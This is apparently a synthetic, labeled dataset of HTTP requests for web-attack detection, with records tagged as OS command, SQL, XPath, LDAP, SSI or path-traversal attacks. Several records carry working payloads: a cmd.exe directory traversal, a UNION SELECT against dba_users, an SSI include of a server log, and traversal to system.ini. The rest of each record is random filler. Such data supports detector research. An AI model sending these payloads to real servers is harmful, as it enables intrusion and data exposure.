From: shqwscZ@htnl9xec.gov
If-Modified-Since: Sat, 18 Sep 04 06:42:35 UTC
If-Unmodified-Since: Tue, 22 Aug 06 23:44:06 CET
If-Match: *
If-None-Match: "qqMuAopr3ZgKbwt"
If-Range: "7.E-0cpfveONQwjV0V3"
Max-Forwards: 9539
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: wCwbd1 E1saai=4olnf
Authorization: NTLM Z2YxM2lmdHl0aG1udG1ydEF0cm9BV2U4aUF3cnJ0dzBJbmxlbW5ybjd0
Range: 5-,297-087
Referer: http://www.seHFeEp.uk/ocpy.nsf
TE: chunked;q=0.2,trailers
Trailer: Accept-Language
User-Agent: nea2hLuY http://www.rra4D.gov
UA-CPU: PowerPC
UA-Disp: 2548,1743,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 770x317
Via: 2.2 201.112.45.110
Transfer-Encoding: deflate
Upgrade: vYs/1.2
Warning: 943 www.FaAepr.shtml "i9ws4h7nus" 
X-Forwarded-For: 105.35.228.101
X-Serial-Number: 35061677814454
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

neewGsassrne=236784&ntgettdot5=iirct&se=pmt2Cniassts&a3veehcrndj=698533549&3sras=35782754&k22Wd=GprastrVc3aienbgL&izdhti=lcvta&qsHMR=ic&e3dzeeceuu=<e&awh/6s2eotw &eewtd=Eiagyeeve6qiPnd&settdihRct=)  ( |    (s652=e8rai*)&fqeraeomsrrl=aefdtzaSrpaatb8o

End - Id: 37602
Start - Id: 43502
class: OsCommanding
GET /dHM35ZW.X/dD6NfW4/wuUemKBHpIYA/ntsaoi0tAseMeirlze/qUE5EsAWyzjC5ji/ep8GZib3/r98IzDjlZK3rCKuxT4/aT.asp?hoevet=mail+++++aded3ih%40eeKnve.wndt.gov+%3C%3C%2Ftmp%2Fwu.c%3B HTTP/1.1
Host: 191.156.148.239:8000
Connection: keep-alive
Accept: text/*, application/*;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: adrrd-a, dS-e, 2Tn-gtiw, bpeeoo1-Gwnnon;q=0.4, 3a-ifa;q=0.2
Cache-Control: max-age=0
Client-ip: 220.97.61.79
Cookie: Pp8noHi7nayle5=9095;0Adot=opun4Meen;tDideuHgL=ttrsmxx43aodmt;5O1uaot=$
Cookie2: $Version="629"
Date: Sun, 25 Mar 07 22:36:14 UTC
ETag: "1ZIJyiA7qSu4@.@P-w"
Expect: 100-continue
From: entRerd@7ndhcnQeej.be
If-Modified-Since: Mon, 24 Sep 07 08:01:16 GMT
If-Unmodified-Since: Fri, 12 Jun 09 08:20:36 CET
If-Match: *
If-None-Match: "5jIqrngsvo7.AafNA"
If-Range: *
Max-Forwards: 47
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Basic bFJvZ25nOmVmVGNx
Authorization: NTLM eW9jZXVpVWU2SzhsYmVuOGV0ZXFha2p2bW90d2xpdGFFZ2FlZQ==
Range: 32-61,4386-85
Referer: http://www.uhhOth.org/Lih4tn/x9tna/eaiottq/pwtnat/2Ldt.rar
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/4.6 (X11; U; Open BSD i386 5.4; re-ye; rv:4.0.1) Gecko/90976833
UA-CPU: MIPS
UA-Disp: 777,376,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 5281x2497
Via: 7.2 www.wRoy.htm, 3.7 66.63.168.252:3, HTTP/8.8 www.Dnoi.jpeg:97
Transfer-Encoding: gzip
Upgrade: kqj/8.1, ydnbd/4.5, 5cs/8.0, hcilT/8.3, 4abi/5.9
Warning: 900 www.eenCnh.jpeg "aDmktlcy9embade" 
X-Forwarded-For: 106.96.131.159
X-Serial-Number: 521013041943
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43502
Start - Id: 49520
class: XPathInjection
GET /2MblUbE17crNov/caracixyefrhsjrej/yxjD@NlMc_yO@gKVk/dir/mDVRwWZqp/hEBGWYNT_t@/bWpZ-S/bu.js?anuzktynsE7i9iE=oscT++r+U&execuwmetc=aheee%27++++or+++++1%3C+++y4b%2Fq%2Fp5kw%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D7%5D+++or+++%27tkc%27++++%3D++%27&heetorIgua=selectne&pgn9HLYv=3N9Wqle&HJ6Kwp-E=e.KG2OE&wasucoopay=ey&ttltVonauettao=o9llegcu0r4t9Lrohq&thzf=v%3D5allBf%2Byvall4shutdown-caccess_log&y2llasntni=24092815&m63fuaqemPexsl=e-mt7&aul4itorhuesji=eswi5i%2Fhsum3ays&auomaajdrrhs=8GyD_DEZwO&udtdnhmhhsoO=40181&safLthog=5386502 HTTP/1.0
Host: www.oceIM.biz
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-ce, gb2312;q=0.3, iso-8859-7, x-mac-korean;q=0.3, iso-8859-8
Accept-Encoding: 
Accept-Language: m-dedei, ouyaI7-lAg;q=0.8, oeh-ecaau;q=0.9, g1gnse-Membhi, a4ddfi-vgtdan
Cache-Control: no-store
Client-ip: 236.52.73.161
Cookie: Pk9DYugN68=9dib;5ntr1o0feueiwo=7482192;YEdt4E63=zTm
Cookie2: $Version="29"
Date: Sun, 24 Jun 07 15:59:45 GMT
ETag: W/"64h4ckzIruMjC@Dq"
Expect: 100-continue
From: eaatpaso@ksiwaan.org
If-Modified-Since: Sat, 14 Aug 04 01:37:35 CET
If-Unmodified-Since: Thu, 26 Aug 04 23:07:15 GMT
If-Match: "a3.ksc56FP-hu2Fy"
If-None-Match: *
If-Range: *
Max-Forwards: 389
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: ao6tbr qsmelsdm=S7mcd8of
Authorization: Digest nc=81065811
Range: 72-,357-,72130-42
Referer: /ridugfth/iegto3/zepat.pl
TE: deflate;q=0.5
Trailer: If-Match
User-Agent: otgmsi
UA-CPU: Sparc
UA-Disp: 2924,8513,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 5470x3164
Via: HTTP/4.1 www.iamhu.png, 5.9 www.telee.css, 1.1 www.nqaientb.html
Transfer-Encoding: compress
Upgrade: 2ao/4.8
Warning: 600 www.plsuhdu5.css "oa6ejaaRibdipelretOe" 
X-Forwarded-For: 224.66.157.216
X-Serial-Number: 4596241823364339
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 49520
Start - Id: 49287
class: XPathInjection
GET /ZcBsQ4BTz7D4hbU/w-.ekqTA/nTaH8_u.M6GVr/ueua/tmp7.html?amde=rsyr&9oo=60821824&ApassthruGtmpVA9ppL@y=757&h63c1=ryara%27+++++or+%28i++++%3C++count%28lr%2Fchild%3A%3Atext%28%29%29++and++j++++%3C+count%28yo%2Fchild%3A%3Acomment%28%29%29++and+++++k+%3C+++count%28an2%2Fchild%3A%3A*%29+%29++++or++++%27ee%27++%3D%27++4ny%27++or&b1wesire3tyorGa=2l%2FtekBrs%7Ea4eaahU&weD=ntgth2i&etein5C=e%5Cgtm&bodyNP6TBAuT3=E8l&hiyDdLtnei8=b&a1gaddaten=2358985&urdayIno=sxrs9Piss%3Dsb&cmrredrxhtRp=58741&SY8metaGc=wgetadmintwT HTTP/1.1
Host: 126.149.163.74
Connection: close
Accept: */*
Accept-Charset: hz-gb-2312;q=0.1, windows-1251;q=0.0, windows-1250;q=0.1, x-mac-greek
Accept-Encoding: identity, deflate;q=0.1, identity;q=0.0, identity
Accept-Language: c7otzc-sn;q=0.4, snca3S-9osd;q=0.8, awone-nOien, mxvlnt-6brR
Cache-Control: min-fresh=6082
Client-ip: 226.125.42.173
Cookie: acceptGdX=50500666;els3aDndeTfnfad=3
Cookie2: $Version="213"
Date: Thu, 25 Jan 07 08:13:18 UTC
ETag: "kip5j5ec5RFhUSVhtKck"
Expect: 100-continue
From: ttIceawb@smJnerkeg.com
If-Modified-Since: Sun, 19 Jun 05 09:51:40 UTC
If-Unmodified-Since: Mon, 11 Oct 04 11:10:09 UTC
If-Match: "6o-ou3PphaqUXnIc4-kv"
If-None-Match: "4KudhqUQ5Aq5tvloe"
If-Range: Thu, 17 Jun 04 18:51:47 CET
Max-Forwards: 5
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: NTLM ZWFTNWlvZXFpZXV0YWhuMHVuZGhhZG9xZXEwNW4wbmtkbnFu
Authorization: Digest username="eo0oTwp"
Range: 305761-528973
Referer: /rR4t/thywnr/g9oRaino/sma7otpO/enak.mpeg
TE: gzip;q=0.8
Trailer: Trailer
User-Agent: 5deh9xe/9.5.1.7.3
UA-CPU: Sparc
UA-Disp: 284,977,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 7888x6205
Via: Ecne/2.1 177.112.49.91:5, sA1/5.1 140.70.60.237:7405, 1.8 61.255.198.206
Transfer-Encoding: tnnc
Upgrade: eso/2.4, aboa/1.7
Warning: 952 www.opnaAke.tiff "wdiercrcmppwienapny" 
X-Forwarded-For: 18.172.169.90
X-Serial-Number: 15070707581939695
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49287
Start - Id: 49527
class: XPathInjection
GET /mTdudo/YstyleQqOJ9bV9/CZEautoexecrgXVYHautoexecUL/sC/k4ssfshqanEu/zs2Em6ErcXD1OPY/k-WwOVMeDqyp/h01KDOin/er40/laoNnqpIegam.htm?pitm=e%2Fe%2Ftgln%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D5%5D++++or+%27ch9n%27+++%3D++++%27&bt1ph=41oxx&nlciixhiia5y=%29evaleieitu&NSqvy=s0TA.H3FL3&H94.o=9959286030&nttdh=eJCDX6&egY9jexecvBNiinput=a HTTP/1.0
Host: 237.220.207.24
Connection: acHuc1it
Accept: */*
Accept-Charset: iso-8859-9, windows-1255, x-mac-roman;q=0.4, cp-936, koi8-r
Accept-Encoding: gzip;q=0.0, gzip, deflate, identity;q=0.9, compress
Accept-Language: *
Cache-Control: i5um='imsin'
Client-ip: 91.134.19.242
Cookie: nJ=hWXnMRAH3Gl;Ae=2;Oaidesemxutfats=1974831;eoaisqii=56628;s9gPsn=eaeae;beiieote2d=rgi2oiD
Cookie2: $Version="18"
Date: Sun, 14 Oct 07 15:52:15 GMT
ETag: "pUBVRGni3kIAQ_BM_qDc"
Expect: Set5qe
From: jwtneu@uosy.be
If-Modified-Since: Sun, 12 Apr 09 20:51:59 UTC
If-Unmodified-Since: Tue, 09 May 06 03:54:09 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 760
MIME-Version: 4.3
Pragma: oNs3r7i=ad1engl
Proxy-Authorization: ae9cy3 mcawsh6=6imqoMWi
Authorization: NTLM c2RlbGl0Y1NObHJ0bmljZVVhdG5nbmxpaE5zZHNUbW9naTVlb25ubg==
Range: 72-,357-,72130-42
Referer: http://ewshaaSM.com/yhh5doj/hssh1/bplB4f/ovao/cumle2.htm
TE: deflate;q=0.5
Trailer: Trailer
User-Agent: Mozilla/8.4 (X11; U; Unix 9.9; et-hr; rv:9.7.4) Gecko/18388366
UA-CPU: Sparc
UA-Disp: 2924,8513,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5470x3164
Via: FTP/9.8 1.93.204.175
Transfer-Encoding: eetfro
Upgrade: 2ao/4.8
Warning: 066 177.133.141.195 "uvomreyngrucmsS" "Mon, 08 Mar 10 06:12:12 GMT"
X-Forwarded-For: 224.66.157.216
X-Serial-Number: 4596241823364339
----: --------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49527
Start - Id: 49008
class: XPathInjection
GET /nt5u2/ix0@nElP/ilDxo_Zsdk4Z94/e_Em9xArxf3NbxH.css?Znph-ohT8TmU=Ue6thaFf&tlnidEinsfE=Rej8e%27++++or+count%28++++path%2Fchild%3A%3Anode%28%29%5Bposition%28++++%29%3D%28%28++++i%2B+j%2B+++k%2B++l+++%2B+++1%29%5D+++++%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or+%27aai%27++++%3D++++%27+aexeqo%27+++or HTTP/1.1
Host: 83.42.64.141
Connection: close
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: no-transform
Client-ip: 178.164.49.79
Cookie: rnli=p5i;21hnnOv=4access_log;rsOceUonbtr2wn=dhAleatunrmee8vr8;hiabeo=heAat5qlf;_3_d.YTA4eUj=8412101773;cttHvHn0frtn==wgete
Cookie2: $Version="24"
Date: Tue, 06 Jan 09 19:24:47 CET
ETag: W/"A_OF1TsXBNTJNorCOij"
Expect: neesae=gssh
From: w6wr@nytn.it
If-Modified-Since: Thu, 23 Apr 09 18:17:43 UTC
If-Unmodified-Since: Mon, 28 Jul 08 20:04:49 GMT
If-Match: "k@dnYl8d3xyUDeNHpV"
If-None-Match: "sQmejrSvS2GLgTu"
If-Range: "iZm_0vun_wVTYBE"
Max-Forwards: 2
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: NTLM aGhmYTFhcnlxZWh1bmFhZXVvYkd0aXlmcmRCYTJyeXJlaW4=
Authorization: Basic dGxpd2VjOmF0YzgxY21u
Range: -31
Referer: /itOa/t6uwo/leao.fgf
TE: deflate;q=0.5,gzip,deflate
Trailer: From
User-Agent: krcsbc (htSfw7e; stJUHttA; 7@TjpIRnOq; njH8sRtTkh; 47Ep1-W5-)
UA-CPU: 68000
UA-Disp: 787,994,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 4125x649
Via: HTTP/8.6 www.taT1iA2.css, 0.4 www.strna.htm, FTP/4.1 www.aroSir.gif
Transfer-Encoding: deflate
Upgrade: meeoe/8.2, nir2fe/4.3, eS7e/1.8, nerHu/7.3
Warning: 909 www.ltbsdofa.js "dHgusFu9" 
X-Forwarded-For: 85.135.62.221
X-Serial-Number: 544350626543951868
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49008
Start - Id: 41398
class: SqlInjection
POST /e47Y7-wtWCR/nYVO/HZpiS0ucHSioH/qsOle/t3d/gXpIwK/mbpZhgeiiizEe/pELz1V9ruhS/CqXCY2WDA3exec8/mTcNJ2o3.js? HTTP/1.0
Content-Length: 202
Content-Language: tln41,otEo,sg8eg5ea
Content-Encoding: gzip
Content-Location: http://8idctd.be/adnzt/Ahefsd/tshi/mEeilS.gz
Content-MD5: c2VlZGVkZXRlcm9pNW1mMw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 20 Jun 07 09:07:08 GMT
Last-Modified: Sun, 03 Apr 05 22:31:35 UTC
Host: 144.245.0.124
Connection: close
Accept: */*
Accept-Charset: x-mac-chinesetrad;q=0.3, x-mac-chinesesimp;q=0.9, utf-8, x-mac-roman;q=0.3
Accept-Encoding: gzip, deflate;q=0.5
Accept-Language: T-edw4b, Attmn-U;q=0.1
Cache-Control: no-store
Client-ip: 87.5.203.76
Cookie: rnuecErm5e=7133890
Cookie2: $Version="59"
Date: Thu, 18 Oct 07 18:05:34 GMT
ETag: "lIiRlIPKte_9Hpgpj"
Expect: 5ERmu=ncdsee
From: xttrniQd@tSeAtnO.net
If-Modified-Since: Tue, 27 Jul 04 03:36:56 GMT
If-Unmodified-Since: Fri, 06 Nov 09 18:59:22 CET
If-Match: *
If-None-Match: "VudQT9_2hoiwxMm"
If-Range: Thu, 14 Apr 05 23:51:19 CET
Max-Forwards: 0
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Digest opaque="ia4zuj"
Authorization: Digest uri=http://eI1oyl3r.net/tiehotb/hkua.jsp
Range: 711-
Referer: /ci6n/lcmy/t3ioazt.exe
TE: deflate;q=0.1
Trailer: Upgrade
User-Agent: amdreTha/8.9.5
UA-CPU: 68000
UA-Disp: 0223,7526,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1178x5140
Via: HTTP/1.3 www.6meeniae.js:105
Transfer-Encoding: gzip
Upgrade: ltbi/4.7, tales/0.8, zhnie/8.7, osts/9.3, yne/5.8
Warning: 883 www.uoctiy9.gif "iy8rsanss" "Tue, 08 Apr 08 02:11:02 CET"
X-Forwarded-For: 172.76.114.81
X-Serial-Number: 3067055271
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

0ei3=46&rn2q9fumew= s|&Oaic=acceptuTa&Liaf1fpn3hsohr=5343884&Sq4.kc8xdwo=Ic'/**/UNION/**/SELECT/**/bye/**/FROM/**/dba_users/**/WHERE/**/zyugyt/**/like/**/'%25

End - Id: 41398
Start - Id: 43950
class: OsCommanding
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 128.153.166.78:09
Connection: grni2sj
Accept: application/*;q=0.7, audio/basic;q=0.9, image/gif;q=0.5
Accept-Charset: x-mac-japanese, iso-8859-6;q=0.1, windows-1255
Accept-Encoding: *;q=0.8
Accept-Language: qn-peop, dfm-glnt8l;q=0.9
Cache-Control: max-age=44655
Client-ip: 203.44.173.36
Cookie: azabauurmo=eltii|;Totkiyoast1nd=8112802;dNm9oooa8n=fHJPeGIX;suourdauNroiT=rmXee>nup
Cookie2: $Version="790"
Date: Mon, 21 Jan 08 02:01:52 CET
ETag: "Nd4SKGTA_nnaZTH0"
Expect: Ktdna
From: axenii@lMdner.de
If-Modified-Since: Sun, 30 May 04 15:32:31 GMT
If-Unmodified-Since: Tue, 26 Sep 06 03:10:26 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 16 May 07 04:00:05 CET
Max-Forwards: 28
MIME-Version: 3.4
Pragma: tdghaoVa='Rgnih'
Proxy-Authorization: enro elaaRn=qkanorol
Authorization: e42o tgdbtaS=n2RlHdr9
Range: 2091-214
Referer: /weeN/Mdiih/btnt/ti7eeia.php3
TE: trailers
Trailer: Via
User-Agent: nozeoeaS/3.9.5.9.0
UA-CPU: 68000
UA-Disp: 068,6822,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 539x520
Via: FTP/6.5 173.207.86.37:19, 8.1 www.et7on6ie.html, 2.0 254.93.181.148
Transfer-Encoding: caaa
Upgrade: pAn/5.4, eynSnm/6.6
Warning: 327 www.3eSas.css "tdlqjc" "Sat, 26 Jan 08 18:17:22 CET"
X-Forwarded-For: 157.151.213.231
X-Serial-Number: 221610848523557
----: ------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 43950
Start - Id: 37007
class: LdapInjection
GET /ye1mfph0ddueoahk0e/FzXrG90SBcRNlO/epDt/h8b9/uvW1cGw_M-1d7YvyJ/sJloFPeyamBcwPTkbO0G/pMH84gp-RNeXHl4N8p/dm9jOSZ5cY5httpsoXcat/aennhReimdrE8/titeoR.tiff?hwadra1ea1a=nse%29%28%26%28objectClass+%3Dalt*%29&tl=aI0G.8M&aimwhesme=ect&92vl=aVV5lA HTTP/1.0
Host: www.RdLihie.org:80
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.7
Accept-Encoding: gzip;q=0.2
Accept-Language: sFonEb-rgehHntr;q=0.6, onllyOse-ehceao;q=0.7, oplprasj-Ec;q=0.3, eeoe-oRqms, gt-twte;q=0.0
Cache-Control: ueudees='r3eLrcby'
Client-ip: 134.238.253.203
Cookie: 6ae=46407;te1io5301IorE=nfftp;rqauin=91742;eot8irw=5265145;ysthuoeoi=|5;urnt=14
Cookie2: $Version="554"
Date: Mon, 07 Jan 08 15:02:55 UTC
ETag: "wRhCcv9Re9WpU6WH86K1"
Expect: 100-continue
From: ullaa@pmrm.cz
If-Modified-Since: Sat, 14 Apr 07 21:25:48 GMT
If-Unmodified-Since: Wed, 26 Nov 08 06:19:05 GMT
If-Match: "63w1is9@LL@QTw0CiXV0"
If-None-Match: "ToxdwizwbQJF.UzWqV"
If-Range: Sat, 27 Sep 08 17:09:04 GMT
Max-Forwards: 07
MIME-Version: 6.2
Pragma: gemy='ha'
Proxy-Authorization: NTLM bjhjeWN6aXRhb2VyY2VzcnBvOXloU2Y1dnJsdGhsNnRyOG5pb2N4TE4=
Authorization: NTLM cGxyT25vaHU2OWFtc2ppaThodDdqWW1oekNjbHdlUmFlc2JlYWZlU2V0WWV0
Range: 11-,-9658
Referer: http://www.7hegwsee.be/8zkor/citlm.rar
TE: gzip;q=0.0
Trailer: Cache-Control
User-Agent: Mozilla/1.2 (Machintosh; U; PPC 0.4; sn-we; rv:6.2.7) Gecko/27678829
UA-CPU: PowerPC
UA-Disp: 720,086,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 8274x205
Via: loi/9.3 135.61.31.29, 3.4 www.cSreauo3.png, 8.1 www.eehoDnoi.tiff
Transfer-Encoding: 2ril2; eaqc=nanho
Upgrade: dho/9.5, 3oax/1.9
Warning: 992 www.dyteeg.tiff "riPlyr" 
X-Forwarded-For: 164.143.217.25
X-Serial-Number: 4092233930
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37007
Start - Id: 49011
class: XPathInjection
GET /osDbeAhe/aqVeAmTD/cKRhQsiiny8ndn8te/6b48BaO7d3Fy/tE89AhLYwT0KD/r3Y4d/vB/eEgx3ph/aarunoh2e5kctee/lfN@6/jtfLT6rom/HconnectevalaZ.nsf?eionu=6782101&etqltlekes=854&B@z1a=873&ulakmt5OekNDeA=hc%5Cimg5syk&laiezokfElhdmdt=5udipr7Eiecn&U0O5vallwKrKDj=ear&Q_scriptB3zllP=xWzVg&oloIlhtdoni=uNSS%40qkHWkP&kr=cretun%27++++or++6++%3C+++count%28path%2Fchild%3A%3A*%29++or++%27wdaYrcsx%27++%3D++%27&HXdi3rkogle=33&xul=ecaip9wfnsoE&et=5398804&hi3rNqemehb=73942&EXmdropcdeleteyrWeL6=f+ HTTP/1.1
Host: www.idlotiU5.cz:80
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: euc-jp;q=0.9, iso-10646-ucs-2, x-mac-japanese, windows-1254, koi8-r;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 219.107.221.160
Cookie: @VFautoexeclBOQnph-R=00
Cookie2: $Version="22"
Date: Thu, 12 Apr 07 08:03:27 CET
ETag: W/"A_OF1TsXBNTJNorCOij"
Expect: EtKttam=ESeh
From: w6wr@nytn.it
If-Modified-Since: Sun, 06 Mar 05 21:48:57 GMT
If-Unmodified-Since: Fri, 20 May 05 14:12:56 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 16 Feb 05 24:22:43 CET
Max-Forwards: 7828
MIME-Version: 9.3
Pragma: eT=eieet
Proxy-Authorization: NTLM aXNlcm54Q3Nsa2FvbmVOaWlvQWV0bG9uMXhqbHdvZTg=
Authorization: Basic YkVybmVyUjphZDlwZQ==
Range: -31
Referer: http://mnl6ttR.gov/meewt/2on1coT/irnv.pl
TE: deflate,deflate
Trailer: From
User-Agent: qvrenntei/9.9.9.8.9
UA-CPU: 68000
UA-Disp: 787,994,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 3985x064
Via: FTP/5.6 70.77.47.39
Transfer-Encoding: deflate
Upgrade: meeoe/8.2, nir2fe/4.3, eS7e/1.8, nerHu/7.3
Warning: 584 www.to8Zs.jpeg "prpRute" 
X-Forwarded-For: 85.135.62.221
X-Serial-Number: 544350626543951868
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49011
Start - Id: 37984
class: LdapInjection
GET /nAGJn@.js?rLHSU7W._1Cv=eIehavingllikeLhenw+&ri=tyyRMT&ypcmCt=irrpf+&zLWti=119275&fwls3neepo=e4h&SnsseuihIek=TathSa7t&adsN=%25ltl&qeRi1x7xdoentz=tjcMese&mthdCt=%29+%28++%7C++++%28displayName%3Dhad*%29++%28name+%3D++++had*++++%29%28+mail%3Dhad*+++%29&ersE=f%2Fes HTTP/1.0
Host: 25.124.24.98:5233
Connection: myhttt2
Accept: application/*;q=0.2
Accept-Charset: windows-1252;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=014
Client-ip: 118.2.117.183
Cookie: 8uorvoda08toasj=i
Cookie2: $Version="556"
Date: Mon, 28 Jul 08 19:05:11 CET
ETag: W/"X6DZQRvQqkAgn7Mj"
Expect: 100-continue
From: ismia@jutuoqaes.be
If-Modified-Since: Sat, 25 Nov 06 12:59:21 UTC
If-Unmodified-Since: Mon, 01 Feb 10 24:51:41 GMT
If-Match: "DIrgNt38o2Ti-BleRxrL"
If-None-Match: "K8K7mnWMiM.L8t4B"
If-Range: "ZxYGr-EE-ul2cKxlyV"
Max-Forwards: 49
MIME-Version: 4.1
Pragma: n='iteCc'
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Basic RWJlbjppdGV0
Range: 4893-,-7197
Referer: /1euwset.gz
TE: trailers,gzip
Trailer: Warning
User-Agent: Mozilla/9.3 (Windows; U; WinNT 6.6; ty-Mv; rv:6.3.0) Gecko/96886226
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 8848x2681
Via: FTP/1.4 193.183.36.68, FTP/5.1 www.Irdjlph.jpg, 2.2 178.31.65.174
Transfer-Encoding: deflate
Upgrade: ieu/6.3
Warning: 919 www.siLiann.jpg:37 "teLew" 
X-Forwarded-For: 59.231.233.194
X-Serial-Number: 800649
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37984
Start - Id: 39512
class: SSI
GET /FdPC/soniit7ijmrrhses/oc.i3qV3C7/yh/neeNGYWFXTe8h1.bin?shtdrcs6et=81663&d9fuoeos2o=t-2QGBL1&childyEf@A=O&0ltRBzElkle5edc=reeesedcontcm HTTP/1.1
Host: 118.78.216.217:5
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: <!--  #include   virtual="/var/log/httpd/access.log"    -->
Cache-Control: max-age=505
Client-ip: 66.236.196.76
Cookie: lt2wnnlR4uii=041;tuwiyhultnKitia=6440;smwTisalxtisn=(;rcAAT=lse;Tiwnae8b=288
Cookie2: $Version="8"
Date: Sat, 23 Oct 04 18:51:43 GMT
ETag: W/"JTvrF0KVkSqWw0Qfw1X"
Expect: dai2u
If-Unmodified-Since: Fri, 09 Mar 07 02:34:25 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 21 Feb 07 11:18:41 CET
Max-Forwards: 8
MIME-Version: 5.4
Pragma: htitodcm=0tru
Proxy-Authorization: lIess avnetc=geyenG6d
Authorization: NTLM SXQ3Ym5vdGFydXNlcmZyYTNvaWlyME5uaHJuaWdhd2JyY3dlaGRhNzM=
Referer: /eheI/hxhatne.swf
TE: gzip,gzip;q=0.7
User-Agent: e1iNeX http://www.gietevoC.it
Transfer-Encoding: gzip
Upgrade: 7Dste/9.8, aueiat/2.9, 2n1/4.1, rtu5/6.9, ht6dov/4.8
----: -----------------

null

End - Id: 39512
Start - Id: 45753
class: PathTransversal
GET /KmcN0cQXHIqprocessing-instruction/rpPfx/passwdqGL@Z58h/herbanzhcehg0ordwOb.png?gwS=3409151&Mbqwvc=hmaa8eouoa&WastZKstdinkAYz=54&e5nmttm=e&6YtLMRO=%26ett%26%2Byy%24e&GtS.linkKhome_=%3De9&sc1fgtT=ineitkbdechp3t5ro&gsme=%3A2woa2cintct%5D%29r&Atni=lrmoe&hesq0top=soejU&ats4g=dchildt5weee%7CcNgzh&4XR7perl=asl&iigeociTsaaon6=uri&ottn8lrnelr5pAw=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini HTTP/1.0
Host: www.nt1poipH7K.it
Connection: Ge8dvs
Accept: text/*, video/*, image/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: deuo8c-yemuhc;q=0.1, aafY-mn0n;q=0.0
Cache-Control: min-fresh=23709
Client-ip: 18.179.14.242
Cookie: tfWrecg=59;nROtxwrsmsqae=tdL;oywl=Ota;dew=die+
Cookie2: $Version="51"
Date: Fri, 11 Sep 09 18:45:00 UTC
ETag: W/"XOfNqF66G.unu7sQ.q1p"
Expect: 100-continue
From: nbuYYe@rnspS.ch
If-Modified-Since: Mon, 07 Aug 06 04:21:49 CET
If-Unmodified-Since: Tue, 04 Apr 06 19:47:51 GMT
If-Match: *
If-None-Match: "T@Y6o5kDzgA1A_hcbZ.h"
If-Range: *
Max-Forwards: 11
MIME-Version: 3.0
Pragma: s=lnv
Proxy-Authorization: Digest response="a3eEBd48f4d2C0994e6A30104B6a6Ecf"
Authorization: Digest response="094fe2ECEd1ec8875845BBFbA6Aae73d"
Range: -500252,934-3694
Referer: /i9re.shtml
TE: trailers,deflate,trailers
Trailer: Range
User-Agent: Mozilla/9.2 (X11; U; Open BSD i586 4.9; Ts-Sn; rv:4.2.8) Gecko/25212210
UA-CPU: StrongARM
UA-Disp: 0244,7553,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 337x559
Via: saehs/0.0 www.fcaW2ptt.shtml:909
Transfer-Encoding: 3Epmo
Upgrade: aGdne/3.3, slrmIL/7.0, hsea/2.9, wrhit/9.0
Warning: 138 195.65.50.48 "amRyeeev4t" 
X-Forwarded-For: 156.175.229.133
X-Serial-Number: 82558
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45753
Start - Id: 45325
class: PathTransversal
